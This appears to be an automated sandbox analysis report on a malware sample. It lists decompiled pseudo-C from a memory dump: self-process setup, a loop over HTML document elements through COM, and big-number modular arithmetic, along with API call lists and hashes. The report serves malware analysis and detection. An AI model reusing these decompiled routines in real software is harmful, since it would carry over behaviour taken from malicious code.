                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1449191863-0
                                                                                                                                                                                                    • Opcode ID: a99741301e44b04931140370284f8d13ab0534b8e8b41c82c9cd9b63d9003c06
                                                                                                                                                                                                    • Instruction ID: 17d92ac81fa547130ab82facca9025a918be4538e70e89f80238a2025d5abefb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a99741301e44b04931140370284f8d13ab0534b8e8b41c82c9cd9b63d9003c06
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2016D31501241EBDB307E61ED44F5BBAA9EF587A8F114A29F5A2D20E0D721F816DB31
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E04F69864(intOrPtr _a4) {
                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                    				unsigned int _t4;
                                                                                                                                                                                                    				void* _t5;
                                                                                                                                                                                                    				long _t6;
                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                    				 *0x4f6d26c = _t2;
                                                                                                                                                                                                    				if(_t2 == 0) {
                                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t4 = GetVersion();
                                                                                                                                                                                                    				if(_t4 != 5) {
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					if(_t15 <= 0) {
                                                                                                                                                                                                    						_t5 = 0x32;
                                                                                                                                                                                                    						return _t5;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					 *0x4f6d25c = _t4;
                                                                                                                                                                                                    					_t6 = GetCurrentProcessId();
                                                                                                                                                                                                    					 *0x4f6d258 = _t6;
                                                                                                                                                                                                    					 *0x4f6d264 = _a4;
                                                                                                                                                                                                    					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                                                                                                    					 *0x4f6d254 = _t7;
                                                                                                                                                                                                    					if(_t7 == 0) {
                                                                                                                                                                                                    						 *0x4f6d254 =  *0x4f6d254 | 0xffffffff;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t4 >> 8 > 0) {
                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t15 = _t4 - _t4;
                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                    			}









                                                                                                                                                                                                    0x04f6986c
                                                                                                                                                                                                    0x04f69872
                                                                                                                                                                                                    0x04f69879
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f698d3
                                                                                                                                                                                                    0x04f6987b
                                                                                                                                                                                                    0x04f69883
                                                                                                                                                                                                    0x04f69890
                                                                                                                                                                                                    0x04f69890
                                                                                                                                                                                                    0x04f698d0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f698d0
                                                                                                                                                                                                    0x04f69892
                                                                                                                                                                                                    0x04f69892
                                                                                                                                                                                                    0x04f69897
                                                                                                                                                                                                    0x04f698a9
                                                                                                                                                                                                    0x04f698ae
                                                                                                                                                                                                    0x04f698b4
                                                                                                                                                                                                    0x04f698ba
                                                                                                                                                                                                    0x04f698c1
                                                                                                                                                                                                    0x04f698c3
                                                                                                                                                                                                    0x04f698c3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f698ca
                                                                                                                                                                                                    0x04f6988c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6988e
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04F6103A,?,?,00000001,?,?,?,04F691B4,?), ref: 04F6986C
                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000001,?,?,?,04F691B4,?), ref: 04F6987B
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04F691B4,?), ref: 04F69897
                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04F691B4,?), ref: 04F698B4
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000001,?,?,?,04F691B4,?), ref: 04F698D3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2270775618-0
                                                                                                                                                                                                    • Opcode ID: 022233c8ae30ef56fcf1b67748ada2ed3f424aaaf0fe643ef7b3e7f12c88c9c7
                                                                                                                                                                                                    • Instruction ID: 2bf69b0a3c1ca48e547b2afe6f79a0329b0b420edebecc5ef0993a36c61dbc6b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 022233c8ae30ef56fcf1b67748ada2ed3f424aaaf0fe643ef7b3e7f12c88c9c7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AF0AFB0B4438AEBE7208F34B819F153B60E744711F40451AE5ABC61C4E7B8E80ACF14
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                    			E04F62CC3(intOrPtr* __eax) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				WCHAR* _v12;
                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                    				short _v48;
                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                    				short _v64;
                                                                                                                                                                                                    				intOrPtr* _t54;
                                                                                                                                                                                                    				intOrPtr* _t56;
                                                                                                                                                                                                    				intOrPtr _t57;
                                                                                                                                                                                                    				intOrPtr* _t58;
                                                                                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                                                                                    				void* _t61;
                                                                                                                                                                                                    				intOrPtr* _t63;
                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                    				short _t67;
                                                                                                                                                                                                    				intOrPtr* _t68;
                                                                                                                                                                                                    				intOrPtr* _t70;
                                                                                                                                                                                                    				intOrPtr* _t72;
                                                                                                                                                                                                    				intOrPtr* _t75;
                                                                                                                                                                                                    				intOrPtr* _t77;
                                                                                                                                                                                                    				intOrPtr _t79;
                                                                                                                                                                                                    				intOrPtr* _t83;
                                                                                                                                                                                                    				intOrPtr* _t87;
                                                                                                                                                                                                    				intOrPtr _t103;
                                                                                                                                                                                                    				intOrPtr _t109;
                                                                                                                                                                                                    				void* _t118;
                                                                                                                                                                                                    				void* _t122;
                                                                                                                                                                                                    				void* _t123;
                                                                                                                                                                                                    				intOrPtr _t130;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t123 = _t122 - 0x3c;
                                                                                                                                                                                                    				_push( &_v8);
                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                    				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                                                                                                    				if(_t118 >= 0) {
                                                                                                                                                                                                    					_t54 = _v8;
                                                                                                                                                                                                    					_t103 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    					_t5 = _t103 + 0x4f6e038; // 0x3050f485
                                                                                                                                                                                                    					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                                                                                                    					_t56 = _v8;
                                                                                                                                                                                                    					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                                                                                                    					if(_t118 >= 0) {
                                                                                                                                                                                                    						__imp__#2(0x4f6c2a8);
                                                                                                                                                                                                    						_v28 = _t57;
                                                                                                                                                                                                    						if(_t57 == 0) {
                                                                                                                                                                                                    							_t118 = 0x8007000e;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t60 = _v32;
                                                                                                                                                                                                    							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                                                                                                    							_t87 = __imp__#6;
                                                                                                                                                                                                    							_t118 = _t61;
                                                                                                                                                                                                    							if(_t118 >= 0) {
                                                                                                                                                                                                    								_t63 = _v24;
                                                                                                                                                                                                    								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                                                                                                    								if(_t118 >= 0) {
                                                                                                                                                                                                    									_t130 = _v20;
                                                                                                                                                                                                    									if(_t130 != 0) {
                                                                                                                                                                                                    										_t67 = 3;
                                                                                                                                                                                                    										_v64 = _t67;
                                                                                                                                                                                                    										_v48 = _t67;
                                                                                                                                                                                                    										_v56 = 0;
                                                                                                                                                                                                    										_v40 = 0;
                                                                                                                                                                                                    										if(_t130 > 0) {
                                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                                    												_t68 = _v24;
                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                    												_t123 = _t123;
                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                    												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                                                                                                                                                                    												if(_t118 < 0) {
                                                                                                                                                                                                    													goto L16;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t70 = _v8;
                                                                                                                                                                                                    												_t109 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    												_t28 = _t109 + 0x4f6e0bc; // 0x3050f1ff
                                                                                                                                                                                                    												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                                                                                                                                                                    												if(_t118 >= 0) {
                                                                                                                                                                                                    													_t75 = _v16;
                                                                                                                                                                                                    													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                                                                                                                                                                    													if(_t118 >= 0 && _v12 != 0) {
                                                                                                                                                                                                    														_t79 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    														_t33 = _t79 + 0x4f6e078; // 0x76006f
                                                                                                                                                                                                    														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                                                                                                    															_t83 = _v16;
                                                                                                                                                                                                    															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														 *_t87(_v12);
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													_t77 = _v16;
                                                                                                                                                                                                    													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t72 = _v8;
                                                                                                                                                                                                    												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                                                                                                    												_v40 = _v40 + 1;
                                                                                                                                                                                                    												if(_v40 < _v20) {
                                                                                                                                                                                                    													continue;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L16;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                    								_t65 = _v24;
                                                                                                                                                                                                    								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *_t87(_v28);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t58 = _v32;
                                                                                                                                                                                                    						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t118;
                                                                                                                                                                                                    			}





































                                                                                                                                                                                                    0x04f62cc8
                                                                                                                                                                                                    0x04f62cd1
                                                                                                                                                                                                    0x04f62cd2
                                                                                                                                                                                                    0x04f62cd6
                                                                                                                                                                                                    0x04f62cdc
                                                                                                                                                                                                    0x04f62ce2
                                                                                                                                                                                                    0x04f62ceb
                                                                                                                                                                                                    0x04f62cf1
                                                                                                                                                                                                    0x04f62cfb
                                                                                                                                                                                                    0x04f62cfd
                                                                                                                                                                                                    0x04f62d03
                                                                                                                                                                                                    0x04f62d08
                                                                                                                                                                                                    0x04f62d13
                                                                                                                                                                                                    0x04f62d19
                                                                                                                                                                                                    0x04f62d1e
                                                                                                                                                                                                    0x04f62e40
                                                                                                                                                                                                    0x04f62d24
                                                                                                                                                                                                    0x04f62d24
                                                                                                                                                                                                    0x04f62d31
                                                                                                                                                                                                    0x04f62d37
                                                                                                                                                                                                    0x04f62d3d
                                                                                                                                                                                                    0x04f62d41
                                                                                                                                                                                                    0x04f62d47
                                                                                                                                                                                                    0x04f62d54
                                                                                                                                                                                                    0x04f62d58
                                                                                                                                                                                                    0x04f62d5e
                                                                                                                                                                                                    0x04f62d61
                                                                                                                                                                                                    0x04f62d69
                                                                                                                                                                                                    0x04f62d6a
                                                                                                                                                                                                    0x04f62d6e
                                                                                                                                                                                                    0x04f62d72
                                                                                                                                                                                                    0x04f62d75
                                                                                                                                                                                                    0x04f62d78
                                                                                                                                                                                                    0x04f62d7e
                                                                                                                                                                                                    0x04f62d87
                                                                                                                                                                                                    0x04f62d8d
                                                                                                                                                                                                    0x04f62d8e
                                                                                                                                                                                                    0x04f62d91
                                                                                                                                                                                                    0x04f62d92
                                                                                                                                                                                                    0x04f62d93
                                                                                                                                                                                                    0x04f62d9b
                                                                                                                                                                                                    0x04f62d9c
                                                                                                                                                                                                    0x04f62d9d
                                                                                                                                                                                                    0x04f62d9f
                                                                                                                                                                                                    0x04f62da3
                                                                                                                                                                                                    0x04f62da7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62dad
                                                                                                                                                                                                    0x04f62db6
                                                                                                                                                                                                    0x04f62dbc
                                                                                                                                                                                                    0x04f62dc6
                                                                                                                                                                                                    0x04f62dca
                                                                                                                                                                                                    0x04f62dcc
                                                                                                                                                                                                    0x04f62dd9
                                                                                                                                                                                                    0x04f62ddd
                                                                                                                                                                                                    0x04f62de5
                                                                                                                                                                                                    0x04f62dea
                                                                                                                                                                                                    0x04f62dfc
                                                                                                                                                                                                    0x04f62dfe
                                                                                                                                                                                                    0x04f62e04
                                                                                                                                                                                                    0x04f62e04
                                                                                                                                                                                                    0x04f62e0d
                                                                                                                                                                                                    0x04f62e0d
                                                                                                                                                                                                    0x04f62e0f
                                                                                                                                                                                                    0x04f62e15
                                                                                                                                                                                                    0x04f62e15
                                                                                                                                                                                                    0x04f62e18
                                                                                                                                                                                                    0x04f62e1e
                                                                                                                                                                                                    0x04f62e21
                                                                                                                                                                                                    0x04f62e2a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62e2a
                                                                                                                                                                                                    0x04f62d7e
                                                                                                                                                                                                    0x04f62d78
                                                                                                                                                                                                    0x04f62d61
                                                                                                                                                                                                    0x04f62e30
                                                                                                                                                                                                    0x04f62e30
                                                                                                                                                                                                    0x04f62e36
                                                                                                                                                                                                    0x04f62e36
                                                                                                                                                                                                    0x04f62e3c
                                                                                                                                                                                                    0x04f62e3c
                                                                                                                                                                                                    0x04f62e45
                                                                                                                                                                                                    0x04f62e4b
                                                                                                                                                                                                    0x04f62e4b
                                                                                                                                                                                                    0x04f62d08
                                                                                                                                                                                                    0x04f62e54

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SysAllocString.OLEAUT32(04F6C2A8), ref: 04F62D13
                                                                                                                                                                                                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04F62DF4
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 04F62E0D
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 04F62E3C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1885612795-0
                                                                                                                                                                                                    • Opcode ID: 1ecf542d08d5f46fba5500e4270ab2905a70263f0b3ba01f7fc8052adde7c79a
                                                                                                                                                                                                    • Instruction ID: 848b1bb58db7779d942cc41eb43d0694223367072e480216b541eb740107a532
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ecf542d08d5f46fba5500e4270ab2905a70263f0b3ba01f7fc8052adde7c79a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12515375D0051AEFCB00EFE8C88899EB7BAFF89701B154595E916EB314D731AD42CBA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                    			E04F61721(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                    				void _v92;
                                                                                                                                                                                                    				void _v236;
                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                    				unsigned int _t56;
                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                    				signed int _t79;
                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                    				void* _t92;
                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                    				signed int* _t99;
                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                    				signed int _t103;
                                                                                                                                                                                                    				void* _t107;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t92 = _a12;
                                                                                                                                                                                                    				_t101 = __eax;
                                                                                                                                                                                                    				_t55 = E04F6551C(_a16, _t92);
                                                                                                                                                                                                    				_t79 = _t55;
                                                                                                                                                                                                    				if(_t79 == 0) {
                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                    					return _t55;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                                                                                                    				_t81 = 0;
                                                                                                                                                                                                    				_t96 = 0x20;
                                                                                                                                                                                                    				if(_t56 == 0) {
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					_t97 = _t96 - _t81;
                                                                                                                                                                                                    					_v12 = _t96 - _t81;
                                                                                                                                                                                                    					E04F611C2(_t79,  &_v236);
                                                                                                                                                                                                    					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04F66042(_t101,  &_v236, _a8, _t96 - _t81);
                                                                                                                                                                                                    					E04F66042(_t79,  &_v92, _a12, _t97);
                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                                                                                                                                                                    					_t66 = E04F611C2(_t101, 0x4f6d1b0);
                                                                                                                                                                                                    					_t103 = _t101 - _t79;
                                                                                                                                                                                                    					_a8 = _t103;
                                                                                                                                                                                                    					if(_t103 < 0) {
                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                    						E04F611C2(_a16, _a4);
                                                                                                                                                                                                    						E04F618BC(_t79,  &_v236, _a4, _t97);
                                                                                                                                                                                                    						memset( &_v236, 0, 0x8c);
                                                                                                                                                                                                    						_t55 = memset( &_v92, 0, 0x44);
                                                                                                                                                                                                    						goto L18;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						if(_v8 != 0xffffffff) {
                                                                                                                                                                                                    							_push(1);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push( *_t99);
                                                                                                                                                                                                    							L04F6B048();
                                                                                                                                                                                                    							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                                                                                                    							asm("adc edx, esi");
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(_v8 + 1);
                                                                                                                                                                                                    							_push(_t92);
                                                                                                                                                                                                    							_push(_t74);
                                                                                                                                                                                                    							L04F6B042();
                                                                                                                                                                                                    							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                                                                                                    								_t74 = _t74 | 0xffffffff;
                                                                                                                                                                                                    								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t74 =  *_t99;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                                                                                                                                                                    						_a12 = _t74;
                                                                                                                                                                                                    						_t76 = E04F65F2D(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                    							if( *_t99 != 0) {
                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							L13:
                                                                                                                                                                                                    							_t92 =  &_v92;
                                                                                                                                                                                                    							if(E04F6901A(_t79, _t92, _t106) < 0) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                    							_a12 = _a12 + 1;
                                                                                                                                                                                                    							_t76 = E04F6923D(_t79,  &_v92, _t106, _t106);
                                                                                                                                                                                                    							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                    							if( *_t99 != 0) {
                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_a8 = _a8 - 1;
                                                                                                                                                                                                    						_t66 = _a12;
                                                                                                                                                                                                    						_t99 = _t99 - 4;
                                                                                                                                                                                                    						 *(0x4f6d1b0 + _a8 * 4) = _t66;
                                                                                                                                                                                                    					} while (_a8 >= 0);
                                                                                                                                                                                                    					_t97 = _v12;
                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				while(_t81 < _t96) {
                                                                                                                                                                                                    					_t81 = _t81 + 1;
                                                                                                                                                                                                    					_t56 = _t56 >> 1;
                                                                                                                                                                                                    					if(_t56 != 0) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L4;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                    			}





















                                                                                                                                                                                                    0x04f61724
                                                                                                                                                                                                    0x04f61730
                                                                                                                                                                                                    0x04f61736
                                                                                                                                                                                                    0x04f6173b
                                                                                                                                                                                                    0x04f6173f
                                                                                                                                                                                                    0x04f6189c
                                                                                                                                                                                                    0x04f618a0
                                                                                                                                                                                                    0x04f618a0
                                                                                                                                                                                                    0x04f61745
                                                                                                                                                                                                    0x04f61749
                                                                                                                                                                                                    0x04f6174d
                                                                                                                                                                                                    0x04f61750
                                                                                                                                                                                                    0x04f6175b
                                                                                                                                                                                                    0x04f61761
                                                                                                                                                                                                    0x04f61766
                                                                                                                                                                                                    0x04f61769
                                                                                                                                                                                                    0x04f61783
                                                                                                                                                                                                    0x04f6178f
                                                                                                                                                                                                    0x04f61798
                                                                                                                                                                                                    0x04f617a2
                                                                                                                                                                                                    0x04f617a7
                                                                                                                                                                                                    0x04f617a9
                                                                                                                                                                                                    0x04f617ac
                                                                                                                                                                                                    0x04f6185a
                                                                                                                                                                                                    0x04f61860
                                                                                                                                                                                                    0x04f61871
                                                                                                                                                                                                    0x04f61884
                                                                                                                                                                                                    0x04f61894
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f61899
                                                                                                                                                                                                    0x04f617b5
                                                                                                                                                                                                    0x04f617bc
                                                                                                                                                                                                    0x04f617c0
                                                                                                                                                                                                    0x04f617c6
                                                                                                                                                                                                    0x04f617c8
                                                                                                                                                                                                    0x04f617ca
                                                                                                                                                                                                    0x04f617cc
                                                                                                                                                                                                    0x04f617ce
                                                                                                                                                                                                    0x04f617d8
                                                                                                                                                                                                    0x04f617dd
                                                                                                                                                                                                    0x04f617df
                                                                                                                                                                                                    0x04f617e1
                                                                                                                                                                                                    0x04f617e2
                                                                                                                                                                                                    0x04f617e3
                                                                                                                                                                                                    0x04f617e4
                                                                                                                                                                                                    0x04f617eb
                                                                                                                                                                                                    0x04f617f2
                                                                                                                                                                                                    0x04f617f5
                                                                                                                                                                                                    0x04f617f5
                                                                                                                                                                                                    0x04f617c2
                                                                                                                                                                                                    0x04f617c2
                                                                                                                                                                                                    0x04f617c2
                                                                                                                                                                                                    0x04f617fd
                                                                                                                                                                                                    0x04f61805
                                                                                                                                                                                                    0x04f6180e
                                                                                                                                                                                                    0x04f61813
                                                                                                                                                                                                    0x04f61813
                                                                                                                                                                                                    0x04f61818
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6181a
                                                                                                                                                                                                    0x04f6181d
                                                                                                                                                                                                    0x04f61827
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f61829
                                                                                                                                                                                                    0x04f61829
                                                                                                                                                                                                    0x04f61833
                                                                                                                                                                                                    0x04f61813
                                                                                                                                                                                                    0x04f61818
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f61818
                                                                                                                                                                                                    0x04f6183d
                                                                                                                                                                                                    0x04f61840
                                                                                                                                                                                                    0x04f61843
                                                                                                                                                                                                    0x04f6184a
                                                                                                                                                                                                    0x04f6184a
                                                                                                                                                                                                    0x04f61857
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f61857
                                                                                                                                                                                                    0x04f61752
                                                                                                                                                                                                    0x04f61756
                                                                                                                                                                                                    0x04f61757
                                                                                                                                                                                                    0x04f61759
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f61759
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04F617CE
                                                                                                                                                                                                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04F617E4
                                                                                                                                                                                                    • memset.NTDLL ref: 04F61884
                                                                                                                                                                                                    • memset.NTDLL ref: 04F61894
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3041852380-0
                                                                                                                                                                                                    • Opcode ID: 2ee64b12ca422a3651c96919964b0f820295d09ddc0c92a0eded47290bf2d8f6
                                                                                                                                                                                                    • Instruction ID: a278d5912e08392837ee4941557a1bb367c47ba0250db4e87d19443ca50aa86f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ee64b12ca422a3651c96919964b0f820295d09ddc0c92a0eded47290bf2d8f6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD416172A00259ABEB10DFA8DD80BEE7779EF45714F108529F91BA7180DB70BD46CB90
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
